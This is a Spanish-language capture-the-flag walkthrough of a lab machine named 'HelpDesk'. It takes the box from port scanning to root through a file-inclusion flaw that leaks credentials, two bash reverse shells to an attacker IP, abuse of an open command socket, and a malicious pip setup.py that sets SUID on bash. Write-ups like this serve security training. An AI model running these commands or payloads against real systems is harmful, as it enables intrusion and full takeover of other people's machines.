Enumeramos puertos:
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 172.24.125.228
...
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.13
80/tcp open http Apache httpd
|_http-title: HelpDesk Ticket System
...Enumeramos directorios con gobuster (login.php, panel.php, ticket.php, debug.php):
❯ gobuster dir -u 'http://172.24.125.228' -w directory-list-2.3-medium.txt -x php,txt,html,sql,xml,zip,sh,db -r
login.php index.php ticket.php panel.php debug.php helpdeskFuzzeando parámetros de ticket.php damos con url, vulnerable a LFI:
❯ ffuf -u 'http://172.24.125.228/ticket.php?FUZZ=../../../../../../etc/passwd' -w directory-list-2.3-medium.txt -fs 204
...
url [Status: 200, ...]
...
❯ curl 'http://172.24.125.228/ticket.php?url=../../../../../../etc/passwd'
...
mrmidnight:x:1000:1000:MrMidnight:/home/mrmidnight:/bin/bash
helpdesk:x:1001:1001::/home/helpdesk:/bin/bash
...Con un php filter leemos el código de login.php y obtenemos las credenciales:
❯ curl 'http://172.24.125.228/ticket.php?url=php://filter/convert.base64-encode/resource=login.php'
...
❯ echo 'PD9waHAK...' | base64 -d
...
$stored_user = 'helpdesk';
// SHA-512 hash for password: ticketmaster
...Tras loguearnos con helpdesk:ticketmaster, el panel ejecuta comandos de diagnóstico; lanzamos una reverse shell como www-data:
Enter system command: bash -c 'bash -i >& /dev/tcp/172.24.125.35/1234 0>&1'
❯ ncat -nlvp 1234
Ncat: Connection from 172.24.125.228:44666.
www-data@helpdesk:/var/www/html$En /opt/helpdesk-socket hay un serve.sh que crea un socket UNIX (con socat, modo 777) y, por cada conexión, ejecuta handler.sh, que corre como el usuario helpdesk cualquier comando recibido:
www-data@helpdesk:/opt/helpdesk-socket$ cat serve.sh
/usr/bin/socat -d -d UNIX-LISTEN:$SOCKET,fork,mode=777 EXEC:/opt/helpdesk-socket/handler.sh
www-data@helpdesk:/opt/helpdesk-socket$ cat handler.sh
#!/bin/bash
read cmd
echo "[HelpDesk Automation] Executing: $cmd"
/bin/bash -c "$cmd"Lo probamos enviando id por el socket y luego una reverse shell para saltar a helpdesk:
www-data@helpdesk:/opt/helpdesk-socket$ echo id | socat - UNIX-CONNECT:/opt/helpdesk-socket/helpdesk.sock
[HelpDesk Automation] Executing: id
uid=1001(helpdesk) gid=1001(helpdesk) groups=1001(helpdesk)www-data@helpdesk:/opt/helpdesk-socket$ echo 'bash -i >& /dev/tcp/172.24.125.35/4321 0>&1' | socat - UNIX-CONNECT:/opt/helpdesk-socket/helpdesk.sock
❯ ncat -nlvp 4321
Ncat: Connection from 172.24.125.228:56230.
helpdesk@helpdesk:/$Obtenemos la primera flag. Revisamos sudo -l:
helpdesk@helpdesk:~$ sudo -l
...
User helpdesk may run the following commands on helpdesk:
(ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *pip install ejecuta código arbitrario durante la instalación (setup.py). Creamos un paquete malicioso que pone SUID a bash:
❯ cat setup.py
from setuptools import setup
from setuptools.command.install import install
import os
class CustomInstall(install):
def run(self):
os.system("chmod +s /bin/bash")
install.run(self)
setup(name="package", version="0.1", packages=["package"], cmdclass={'install': CustomInstall})❯ python setup.py sdist bdist_wheel
helpdesk@helpdesk:/tmp$ wget http://172.24.125.35:8000/package-0.1.tar.gz
helpdesk@helpdesk:/tmp$ sudo /usr/bin/pip3 install --break-system-packages package-0.1.tar.gz
helpdesk@helpdesk:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1446024 Mar 31 2024 /bin/bash
helpdesk@helpdesk:/tmp$ bash -p
bash-5.2# whoami
rootObtenemos nuestra flag.
Fin.